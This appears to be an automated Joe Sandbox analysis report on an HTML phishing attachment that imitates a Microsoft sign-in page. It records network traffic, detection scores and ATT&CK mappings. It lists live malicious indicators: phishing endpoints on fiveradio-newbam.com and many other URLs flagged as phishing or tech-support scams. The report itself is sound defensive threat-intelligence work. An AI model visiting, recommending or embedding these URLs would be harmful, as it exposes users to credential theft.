Source: unknown	Network traffic detected: HTTP traffic on port 58282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58300
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58302
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 58290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58298 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58287 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 58302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 58293 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58289
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58288
Source: unknown	Network traffic detected: HTTP traffic on port 58284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58285
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58284
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58287
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58286
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58281
Source: unknown	Network traffic detected: HTTP traffic on port 58288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58283
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58282
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58299
Source: unknown	Network traffic detected: HTTP traffic on port 58281 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58295
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58298
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58291
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58294
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58293
Source: unknown	Network traffic detected: HTTP traffic on port 58285 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58290
Source: unknown	Network traffic detected: HTTP traffic on port 58300 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:58281 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:58282 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:58283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:58296 version: TLS 1.2

Source: classification engine

Classification label: mal96.phis.winHTML@19/34@18/11

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\faturas_dsp.qs.pt_Wednesday, June 5, 2024.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2016,i,5976744131407825480,12042255219168060016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2016,i,5976744131407825480,12042255219168060016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html

HTTP Parser: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
s-part-0014.t-0009.t-msedge.net	0%	Virustotal	Browse
a.nel.cloudflare.com	0%	Virustotal	Browse
d2vgu95hoyrpkh.cloudfront.net	0%	Virustotal	Browse
cs837.wac.edgecastcdn.net	0%	Virustotal	Browse
s-part-0016.t-0009.fb-t-msedge.net	0%	Virustotal	Browse
sni1gl.wpc.omegacdn.net	0%	Virustotal	Browse
www.google.com	0%	Virustotal	Browse
fiveradio-newbam.com	18%	Virustotal	Browse
s-part-0032.t-0009.t-msedge.net	0%	Virustotal	Browse
cdn.socket.io	0%	Virustotal	Browse
aadcdn.msftauth.net	0%	Virustotal	Browse
www.w3schools.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ipinfo.io/	0%	URL Reputation	safe
https://a.nel.cloudflare.com/report/v4?s=ij3e8zh4vqIdvpBudfGCZOfbonEZ0LEAEGOJ%2FXtjWv5sEiE0Wi%2FMK1O4DTnZA6Sk1s%2FG8Pj%2Bac7zvycnyMNSZGhhVNkAnZ1Ot2Tf%2BzJMTRDtsatn5HBlc2RZjCNVfm7QZWZU%2BmMUMA%3D%3D	0%	Avira URL Cloud	safe
https://fiveradio-newbam.com/socket.io/?EIO=4&transport=polling&t=P1TlBfJ	100%	Avira URL Cloud	phishing
https://fiveradio-newbam.com/socket.io/?EIO=4&transport=polling&t=P1TlBzB&sid=n9v-59KTv8aKOUjkACUR	100%	Avira URL Cloud	phishing
https://fiveradio-newbam.com/socket.io/?EIO=4&transport=websocket&sid=n9v-59KTv8aKOUjkACUR	100%	Avira URL Cloud	phishing
https://fiveradio-newbam.com/jsnom.js	100%	Avira URL Cloud	phishing
https://cdn.socket.io/4.6.0/socket.io.min.js	0%	Avira URL Cloud	safe
https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg	0%	Avira URL Cloud	safe
https://fiveradio-newbam.com/jsnom.js	15%	Virustotal		Browse
https://fiveradio-newbam.com/socket.io/?EIO=4&transport=polling&t=P1TlBzD&sid=n9v-59KTv8aKOUjkACUR	100%	Avira URL Cloud	phishing
https://www.w3schools.com/w3css/4/w3.css	0%	Avira URL Cloud	safe
https://a.nel.cloudflare.com/report/v4?s=5LL%2BLj9FtL255ms6XG5KXH%2FlzKiIJeuKMbavLJH7DjdKC8Uw01%2FtU5CGh2AIBwtCRukQAEPShO2mGcBjwqdNT4Bnw9HlpeVAiYXvaF0FgwDOHsVZ5jqVpKN3x7I1eWRK2BeDbakGZA%3D%3D	0%	Avira URL Cloud	safe
https://cdn.socket.io/4.6.0/socket.io.min.js	0%	Virustotal		Browse
file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	0%	Avira URL Cloud	safe
https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg	0%	Virustotal		Browse
https://www.w3schools.com/w3css/4/w3.css	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0014.t-0009.t-msedge.net	13.107.246.42	true	false	0%, Virustotal, Browse	unknown
a.nel.cloudflare.com	35.190.80.1	true	false	0%, Virustotal, Browse	unknown
d2vgu95hoyrpkh.cloudfront.net	18.245.31.78	true	false	0%, Virustotal, Browse	unknown
cs837.wac.edgecastcdn.net	192.229.133.221	true	false	0%, Virustotal, Browse	unknown
s-part-0016.t-0009.fb-t-msedge.net	13.107.253.44	true	false	0%, Virustotal, Browse	unknown
sni1gl.wpc.omegacdn.net	152.199.21.175	true	false	0%, Virustotal, Browse	unknown
fiveradio-newbam.com	172.67.196.150	true	false	18%, Virustotal, Browse	unknown
www.google.com	142.250.185.132	true	false	0%, Virustotal, Browse	unknown
s-part-0032.t-0009.t-msedge.net	13.107.246.60	true	false	0%, Virustotal, Browse	unknown
aadcdn.msftauth.net	unknown	unknown	false	0%, Virustotal, Browse	unknown
www.w3schools.com	unknown	unknown	false	0%, Virustotal, Browse	unknown
cdn.socket.io	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://fiveradio-newbam.com/socket.io/?EIO=4&transport=websocket&sid=n9v-59KTv8aKOUjkACUR	true	Avira URL Cloud: phishing	unknown
https://fiveradio-newbam.com/socket.io/?EIO=4&transport=polling&t=P1TlBzB&sid=n9v-59KTv8aKOUjkACUR	true	Avira URL Cloud: phishing	unknown
https://fiveradio-newbam.com/socket.io/?EIO=4&transport=polling&t=P1TlBfJ	true	Avira URL Cloud: phishing	unknown
https://fiveradio-newbam.com/jsnom.js	true	15%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://a.nel.cloudflare.com/report/v4?s=ij3e8zh4vqIdvpBudfGCZOfbonEZ0LEAEGOJ%2FXtjWv5sEiE0Wi%2FMK1O4DTnZA6Sk1s%2FG8Pj%2Bac7zvycnyMNSZGhhVNkAnZ1Ot2Tf%2BzJMTRDtsatn5HBlc2RZjCNVfm7QZWZU%2BmMUMA%3D%3D	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/	false	URL Reputation: safe	unknown
https://cdn.socket.io/4.6.0/socket.io.min.js	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fiveradio-newbam.com/socket.io/?EIO=4&transport=polling&t=P1TlBzD&sid=n9v-59KTv8aKOUjkACUR	true	Avira URL Cloud: phishing	unknown
https://www.w3schools.com/w3css/4/w3.css	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://a.nel.cloudflare.com/report/v4?s=5LL%2BLj9FtL255ms6XG5KXH%2FlzKiIJeuKMbavLJH7DjdKC8Uw01%2FtU5CGh2AIBwtCRukQAEPShO2mGcBjwqdNT4Bnw9HlpeVAiYXvaF0FgwDOHsVZ5jqVpKN3x7I1eWRK2BeDbakGZA%3D%3D	false	Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.246.42	s-part-0014.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.253.44	s-part-0016.t-0009.fb-t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.185.132	www.google.com	United States	15169	GOOGLEUS	false
18.245.31.78	d2vgu95hoyrpkh.cloudfront.net	United States	16509	AMAZON-02US	false
192.229.133.221	cs837.wac.edgecastcdn.net	United States	15133	EDGECASTUS	false
13.107.246.60	s-part-0032.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.67.196.150	fiveradio-newbam.com	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
152.199.21.175	sni1gl.wpc.omegacdn.net	United States	15133	EDGECASTUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1464027
Start date and time:	2024-06-28 09:25:26 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	faturas_dsp.qs.pt_Wednesday, June 5, 2024.html
Detection:	MAL
Classification:	mal96.phis.winHTML@19/34@18/11
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.184.195, 142.250.185.78, 142.251.168.84, 34.104.35.123, 216.58.206.67, 172.217.18.3, 142.250.185.174
Excluded domains from analysis (whitelisted): logincdn.msauth.net, clients1.google.com, azurefd-t-fb-prod.trafficmanager.net, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, slscr.update.microsoft.com, aadcdnoriginwus2.azureedge.net, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, www.gstatic.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Input	Output
URL: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html Model: Perplexity: mixtral-8x7b-instruct	{"loginform": false,"urgency": false,"captcha": false,"reasons": ["The title and text do not contain any elements indicating the presence of a login form. There are no explicit requests for sensitive information such as passwords, email addresses, usernames, phone numbers, or credit card numbers.","The text does not create a sense of urgency or interest. There are no phrases that encourage the user to click a link or view a document.","There is no mention or indication of a CAPTCHA or any other anti-robot detection mechanism in the provided text and title."]}
Title: Authenticating ... OCR: Trying to sign in Cancel Terms of use Privacy & cookies
URL: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html Model: Perplexity: mixtral-8x7b-instruct	{"loginform": true,"urgency": false,"captcha": true,"reasons": ["The title 'Authenticating ...' suggests the presence of a login or authentication process.","The text 'Trying to sign in' confirms the presence of a login form.","The text 'rm not a robot' indicates the presence of a CAPTCHA or anti-robot detection mechanism.","No sense of urgency is detected in the provided text."]}
Title: Authenticating ... OCR: Microsoft Trying to sign in rm not a robot reCAPTCHA ance Terms
URL: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html Model: Perplexity: mixtral-8x7b-instruct	{"loginform": false,"urgency": false,"captcha": false,"reasons": ["The title and text of the webpage do not contain a login form, as there are no explicit requests for sensitive information such as passwords, email addresses, usernames, phone numbers, or credit card numbers.","The text of the webpage does not create a sense of urgency or interest, as there are no phrases that encourage the user to click a link or view a document.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
Title: Authenticating ... OCR: Microsoft Authenticating . ancel Terms of use Privy & cookies
URL: file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html Model: gpt-4o	```json{ "phishing_score": 9, "brands": "Microsoft", "phishing": true, "suspicious_domain": true, "has_prominent_loginform": true, "has_captcha": true, "setechniques": true, "has_suspicious_link": true, "legitmate_domain": "microsoft.com", "reasons": "The URL 'file:///C:/Users/user/Desktop/faturas_dsp.qs.pt_Wednesday,%20June%205,%202024.html' is a local file path, not a legitimate web domain. This is highly suspicious as legitimate login pages are hosted on secure web servers. The page mimics Microsoft's login interface, which is a common tactic in phishing attacks to deceive users. The presence of a CAPTCHA and prominent login form are typical elements of a legitimate site, but in this context, they are used to enhance the deception. The URL does not match Microsoft's legitimate domain 'microsoft.com'. The combination of these factors strongly indicates that this is a phishing site."}

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
13.107.246.42	https://he110ca11he1lpn0wwb112.pages.dev/	Get hash	malicious	TechSupportScam	Browse
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse
	http://pub-0ed5a1f263894eab8341e034994e9627.r2.dev/park.html	Get hash	malicious	HTMLPhisher	Browse
	https://aka.ms/gettenantid__;!!FRLE-BHliQ!3x_w1Q7SGdHvSo4v2ZLKY3nTDxl4AIh08DaUkuJ8kqLSoWHDCRnXUcjhLBCdsV3PheBEVf_eI4xxpT8Kg5376nh9XLU$	Get hash	malicious	Unknown	Browse
	https://kawak.com.co	Get hash	malicious	Unknown	Browse
	call_Playback_gelita.com.html	Get hash	malicious	HTMLPhisher	Browse
	https://xoxtds.lovelycarrot.com/	Get hash	malicious	HTMLPhisher	Browse
	Electronic Slip_nhbpi.com.html	Get hash	malicious	HTMLPhisher	Browse
	https://www.cognitoforms.com/Bakkerijfuite/BakkerijFuiteBV	Get hash	malicious	HTMLPhisher	Browse
	Payment Confirmation june 27.svg	Get hash	malicious	Unknown	Browse
13.107.253.44	Remit_Advice_SMKT_.html	Get hash	malicious	HTMLPhisher	Browse
	https://ms-doc.secure-chamber-fil3-doc3565.com/?Ld6B=D0T	Get hash	malicious	Unknown	Browse
	https://storageview.us-ord-1.linodeobjects.com/reserved.html	Get hash	malicious	HTMLPhisher	Browse
	QPT 8.9 for PowerPoint.exe	Get hash	malicious	Unknown	Browse
	https://rhwlieir.page.link/kfxD	Get hash	malicious	Unknown	Browse
	MailFrauduleux.eml	Get hash	malicious	Unknown	Browse
	https://sawyerhandyman.xyz/cdevm/Wn0SAni0er08security0er0880/index.html	Get hash	malicious	TechSupportScam	Browse
	PV Questionnaire - Order Fulfillment and Supporting IT.docx	Get hash	malicious	Unknown	Browse
	RemittanceAdvice_processedpayments.htm	Get hash	malicious	HTMLPhisher	Browse
	https://1drv.ms/o/s!BOBDcINhYVehgS6SSMyOkbDblNKq?e=mgHzgZ_k90SgUiDmNf7EPA&at=9	Get hash	malicious	HTMLPhisher	Browse
18.245.31.78	https://vjl.urj7z9q.com/VjL/	Get hash	malicious	HTMLPhisher	Browse
	Quarantined Messages.zip	Get hash	malicious	HTMLPhisher	Browse
	https://www.wiley-epic.com/default.aspx?ac=2T5R8M7L3D	Get hash	malicious	Unknown	Browse
	https://documentshared.transfernow.net/en/bld?utm_source=202406077EMP6zVF	Get hash	malicious	HTMLPhisher	Browse
	http://jeffco.us	Get hash	malicious	Unknown	Browse
	https://eikwr09672.eleteriod.com/9i86j10253/#ZGFuQGFzdHJhbmlzLmNvbQ==	Get hash	malicious	Unknown	Browse
	https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3D	Get hash	malicious	HTMLPhisher	Browse
	https://qki.tfa.mybluehost.me/T/home/net/login.php	Get hash	malicious	Unknown	Browse
192.229.133.221	INVOICE [PAID] ref-A1SQM.html	Get hash	malicious	HTMLPhisher	Browse
	INVOICE [PAID] ref-APOVN.html	Get hash	malicious	HTMLPhisher	Browse
	Budget_Statement.htm	Get hash	malicious	HTMLPhisher	Browse
	0055-fac_aftral.com_Thursday, June 20, 2024.html	Get hash	malicious	HTMLPhisher	Browse
	https://pub-23354ce60e01474fa600cbca2caadc73.r2.dev/index.html	Get hash	malicious	Unknown	Browse
	061324.html	Get hash	malicious	HTMLPhisher	Browse
	https://ipfs.io/ipfs/bafybeidxmipzaalmlognb3rfcfcibqulicnk3gmalayem2sm4xeqphc43a/Delivery.html	Get hash	malicious	Unknown	Browse
	https://my.sitejet.io/goto/3439258/dc5dce685f2ba1e450cdc6f61e8da88fa7883359b772e3a5b673b56475e9885f/my_website_presentation	Get hash	malicious	HTMLPhisher	Browse
	check(1).html	Get hash	malicious	HTMLPhisher	Browse
	https://ipfs.io/ipfs/bafkreifwplcqnc5zn26ubzvn44lf6k2v62bi6vwcwsnpakzpifgqhvt2ve	Get hash	malicious	HTMLPhisher	Browse
13.107.246.60	https://he110ca11he1lpn0wwb112.pages.dev/	Get hash	malicious	TechSupportScam	Browse
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse
	http://pub-0ed5a1f263894eab8341e034994e9627.r2.dev/park.html	Get hash	malicious	HTMLPhisher	Browse
